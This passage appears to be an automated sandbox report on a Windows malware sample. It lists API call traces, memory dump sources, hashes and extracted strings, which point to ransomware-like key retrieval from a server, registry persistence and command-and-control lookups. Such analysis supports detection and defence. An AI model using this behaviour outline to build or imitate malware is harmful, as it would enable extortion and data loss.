                                                                                                                                                                          • Part of subcall function 00BBFE47: __lock.LIBCMT ref: 00BBFE6C
                                                                                                                                                                          • Part of subcall function 00BBFE47: ____lc_codepage_func.LIBCMT ref: 00BBFEB3
                                                                                                                                                                          • Part of subcall function 00BBFE47: __getenv_helper_nolock.LIBCMT ref: 00BBFED4
                                                                                                                                                                          • Part of subcall function 00BBFE47: _free.LIBCMT ref: 00BBFF07
                                                                                                                                                                          • Part of subcall function 00BBFE47: _strlen.LIBCMT ref: 00BBFF0E
                                                                                                                                                                          • Part of subcall function 00BBFE47: __malloc_crt.LIBCMT ref: 00BBFF15
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph (figure not reproduced; legend: Executed / Not Executed)
                                                                                                                                                                        APIs
                                                                                                                                                                        • ___crtCorExitProcess.LIBCMT ref: 00BB7B11
                                                                                                                                                                          • Part of subcall function 00BB7AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00BB7B16,00BB3B69,?,00BB8BCA,000000FF,0000001E,00C97BD0,00000008,00BB8B0E,00BB3B69,00BB3B69), ref: 00BB7AE6
                                                                                                                                                                          • Part of subcall function 00BB7AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00BB7AF8
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00BB7B1A
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph (figure not reproduced; legend: Executed / Not Executed)
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BB3B4C: _malloc.LIBCMT ref: 00BB3B64
                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00BACC83
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph (figure not reproduced; legend: Executed / Not Executed)
                                                                                                                                                                        APIs
                                                                                                                                                                        • _doexit.LIBCMT ref: 00BB7F47
                                                                                                                                                                          • Part of subcall function 00BB7E0E: __lock.LIBCMT ref: 00BB7E1C
                                                                                                                                                                          • Part of subcall function 00BB7E0E: DecodePointer.KERNEL32(00C97B08,0000001C,00BB7CFB,00BB3B69,00000001,00000000,?,00BB7C49,000000FF,?,00BB8B1A,00000011,00BB3B69,?,00BB50D7,0000000D), ref: 00BB7E5B
                                                                                                                                                                          • Part of subcall function 00BB7E0E: DecodePointer.KERNEL32(?,00BB7C49,000000FF,?,00BB8B1A,00000011,00BB3B69,?,00BB50D7,0000000D), ref: 00BB7E6C
                                                                                                                                                                          • Part of subcall function 00BB7E0E: EncodePointer.KERNEL32(00000000,?,00BB7C49,000000FF,?,00BB8B1A,00000011,00BB3B69,?,00BB50D7,0000000D), ref: 00BB7E85
                                                                                                                                                                          • Part of subcall function 00BB7E0E: DecodePointer.KERNEL32(-00000004,?,00BB7C49,000000FF,?,00BB8B1A,00000011,00BB3B69,?,00BB50D7,0000000D), ref: 00BB7E95
                                                                                                                                                                          • Part of subcall function 00BB7E0E: EncodePointer.KERNEL32(00000000,?,00BB7C49,000000FF,?,00BB8B1A,00000011,00BB3B69,?,00BB50D7,0000000D), ref: 00BB7E9B
                                                                                                                                                                          • Part of subcall function 00BB7E0E: DecodePointer.KERNEL32(?,00BB7C49,000000FF,?,00BB8B1A,00000011,00BB3B69,?,00BB50D7,0000000D), ref: 00BB7EB1
                                                                                                                                                                          • Part of subcall function 00BB7E0E: DecodePointer.KERNEL32(?,00BB7C49,000000FF,?,00BB8B1A,00000011,00BB3B69,?,00BB50D7,0000000D), ref: 00BB7EBC
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetVersionExA.KERNEL32(00000094), ref: 00C11983
                                                                                                                                                                        • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00C11994
                                                                                                                                                                        • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 00C119A1
                                                                                                                                                                        • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 00C119AE
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 00C119E8
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 00C119FB
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00C11AC5
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00C11ADB
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00C11AEE
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00C11B01
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00C11C15
                                                                                                                                                                        • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00C11C36
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00C11C50
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00C11C63
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00C11C76
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00C11D45
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00C11D73
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00C11D86
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32First), ref: 00C11D99
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00C11DAC
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00C11DBF
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00C11DD2
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Process32First), ref: 00C11DE5
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Process32Next), ref: 00C11DF8
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Thread32First), ref: 00C11E0B
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00C11E1E
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Module32First), ref: 00C11E31
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Module32Next), ref: 00C11E44
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C11F03
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C11FF1
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C12066
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C12095
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C120FB
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C12118
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C12187
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C121A4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CountTick$Library$Load$Free$Version
                                                                                                                                                                        • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                                                                                        • API String ID: 842291066-1723836103
                                                                                                                                                                        • Opcode ID: b327a9a5236ddfd9fcd57ed638f7d4ccb2312b3bf73e0a7a21ee4dd1bea99522
                                                                                                                                                                        • Instruction ID: b5b8b5f3c8f7505c541fb7f533bb3e78c22343c57374804b3a774d634d99580a
                                                                                                                                                                        • Opcode Fuzzy Hash: b327a9a5236ddfd9fcd57ed638f7d4ccb2312b3bf73e0a7a21ee4dd1bea99522
                                                                                                                                                                        • Instruction Fuzzy Hash: FE324EB4E003299BDB219F68CC45BEEB6B9FF45704F0441EAA60CA6151EB748EC0DF59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • timeGetTime.WINMM(?,?,?,?,?,00C5B3EC,000000FF), ref: 00BAE6C0
                                                                                                                                                                          • Part of subcall function 00B9C6A0: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 00B9C6C2
                                                                                                                                                                          • Part of subcall function 00B9C6A0: RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 00B9C6F3
                                                                                                                                                                          • Part of subcall function 00B9C6A0: RegCloseKey.ADVAPI32(00000000), ref: 00B9C700
                                                                                                                                                                        • _memset.LIBCMT ref: 00BAE707
                                                                                                                                                                          • Part of subcall function 00B9C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B9C51B
                                                                                                                                                                        • InternetOpenW.WININET ref: 00BAE743
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00BAE7AE
                                                                                                                                                                        • _memmove.LIBCMT ref: 00BAE838
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00BAE90A
                                                                                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 00BAE93D
                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00BAE954
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00BAE96F
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAE98C
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAE9A3
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00BAE9CD
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00BAE9F3
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00BAE9F6
                                                                                                                                                                        • _strstr.LIBCMT ref: 00BAEA36
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAEA59
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAEA74
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BAEA82
                                                                                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00BAEA92
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEAA4
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEABA
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAEAC8
                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00BAEAE3
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEB5B
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAEB7C
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BAEB86
                                                                                                                                                                        • _memset.LIBCMT ref: 00BAEB94
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00BAEBAE
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEBB6
                                                                                                                                                                        • _strstr.LIBCMT ref: 00BAEBDA
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAEC00
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAEC24
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BAEC32
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00BAEC3E
                                                                                                                                                                        • lstrlenA.KERNEL32(","id":"), ref: 00BAEC51
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEC6D
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEC7F
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAEC93
                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00BAECB3
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAED2A
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAED4B
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BAED55
                                                                                                                                                                        • _memset.LIBCMT ref: 00BAED63
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 00BAED7D
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAED85
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00BAEDA3
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00BAEDAE
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAEDD3
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAEDF7
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BAEE05
                                                                                                                                                                        • _free.LIBCMT ref: 00BAEE15
                                                                                                                                                                        • _free.LIBCMT ref: 00BAEE22
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEF61
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEFBF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                                                                                        • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00B9DD8D
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00B9DDB6
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9DDE4
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00B9DE0A
                                                                                                                                                                        • gethostbyname.WS2_32(00C90134), ref: 00B9DEA7
                                                                                                                                                                        • inet_ntoa.WS2_32(?), ref: 00B9DEC7
                                                                                                                                                                          • Part of subcall function 00BDF26C: std::exception::exception.LIBCMT ref: 00BDF27F
                                                                                                                                                                          • Part of subcall function 00BDF26C: __CxxThrowException@8.LIBCMT ref: 00BDF294
                                                                                                                                                                          • Part of subcall function 00BDF26C: std::exception::exception.LIBCMT ref: 00BDF2AD
                                                                                                                                                                          • Part of subcall function 00BDF26C: __CxxThrowException@8.LIBCMT ref: 00BDF2C2
                                                                                                                                                                          • Part of subcall function 00BDF26C: std::regex_error::regex_error.LIBCPMT ref: 00BDF2D4
                                                                                                                                                                          • Part of subcall function 00BDF26C: __CxxThrowException@8.LIBCMT ref: 00BDF2E2
                                                                                                                                                                          • Part of subcall function 00BDF26C: std::exception::exception.LIBCMT ref: 00BDF2FB
                                                                                                                                                                          • Part of subcall function 00BDF26C: __CxxThrowException@8.LIBCMT ref: 00BDF310
                                                                                                                                                                        • _memmove.LIBCMT ref: 00B9DF8C
                                                                                                                                                                        • _memmove.LIBCMT ref: 00B9DFFC
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00B9E06C
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008), ref: 00B9E07E
                                                                                                                                                                        • inet_addr.WS2_32(?), ref: 00B9E0C1
                                                                                                                                                                        • DnsQuery_W.DNSAPI(?,00000002,00000002,?,?,00000000), ref: 00B9E0E5
                                                                                                                                                                        • inet_ntoa.WS2_32(?), ref: 00B9E103
                                                                                                                                                                        • _memmove.LIBCMT ref: 00B9E33B
                                                                                                                                                                        • _memmove.LIBCMT ref: 00B9E40F
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00B9E495
                                                                                                                                                                        • DnsFree.DNSAPI(?,00000001), ref: 00B9E4A0
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9E4BC
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,http://), ref: 00B9E4D0
                                                                                                                                                                        • lstrcatW.KERNEL32(?,00000000), ref: 00B9E523
                                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00B9E549
                                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00B9E56A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Exception@8Throw_memmove$_wcsstrlstrcatstd::exception::exception$FreeLocal_memsetinet_ntoa$AllocQuery_gethostbynameinet_addrlstrcpylstrlenstd::regex_error::regex_error
                                                                                                                                                                        • String ID: http://$https://$invalid string position$vector<T> too long
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00BA1010
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BA1026
                                                                                                                                                                          • Part of subcall function 00BC0ECA: RaiseException.KERNEL32(?,?,?,00C9793C,?,?,?,?,?,00BB3B9C,?,00C9793C,?,00000001), ref: 00BC0F1F
                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00BA103B
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BA1051
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000), ref: 00BA1059
                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00BA1064
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BA107A
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00BA1099
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BA10AB
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA10CA
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00BA10DE
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BA10F0
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BA1100
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA110B
                                                                                                                                                                        • _sprintf.LIBCMT ref: 00BA112E
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00BA113C
                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00BA1154
                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00BA115F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BA1915
                                                                                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00BA1932
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00BA1941
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00BA1948
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00BA1956
                                                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00BA1962
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00BA1974
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00BA198B
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,00C90260), ref: 00BA1993
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00BA1999
                                                                                                                                                                        • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00BA19A3
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA19B8
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 00BA19DC
                                                                                                                                                                          • Part of subcall function 00BA2BA0: lstrlenW.KERNEL32(?), ref: 00BA2BC9
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00BA1A01
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00BA1A04
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                                                                                        • String ID: failed with error
                                                                                                                                                                        • API String ID: 4182478520-946485432
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BA1AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA1ACA
                                                                                                                                                                          • Part of subcall function 00BA1AB0: DispatchMessageW.USER32(?), ref: 00BA1AE0
                                                                                                                                                                          • Part of subcall function 00BA1AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA1AEE
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 00B9F900
                                                                                                                                                                        • _memmove.LIBCMT ref: 00B9F9EA
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 00B9FA51
                                                                                                                                                                        • _memmove.LIBCMT ref: 00B9FADA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 273148273-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00C8FCA4,00000000,00000000), ref: 00B9E8CE
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9E8E4
                                                                                                                                                                          • Part of subcall function 00BC0ECA: RaiseException.KERNEL32(?,?,?,00C9793C,?,?,?,?,?,00BB3B9C,?,00C9793C,?,00000001), ref: 00BC0F1F
                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00B9E8F9
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9E90F
                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 00B9E928
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9E93E
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00B9E95D
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9E96F
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9E98E
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00B9E9A2
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9E9B4
                                                                                                                                                                        • _sprintf.LIBCMT ref: 00B9E9D3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                        • API String ID: 1084002244-213608013
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00C8FCA4,00000000), ref: 00B9EB01
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9EB17
                                                                                                                                                                          • Part of subcall function 00BC0ECA: RaiseException.KERNEL32(?,?,?,00C9793C,?,?,?,?,?,00BB3B9C,?,00C9793C,?,00000001), ref: 00BC0F1F
                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00B9EB2C
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9EB42
                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 00B9EB4E
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9EB64
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 00B9EB83
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9EB95
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9EBB4
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00B9EBC8
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9EBDA
                                                                                                                                                                        • _sprintf.LIBCMT ref: 00B9EBF4
                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00B9EC44
                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00B9EC4F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                        • API String ID: 1637485200-213608013
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00BE4B72), ref: 00BE49C7
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00BE49D7
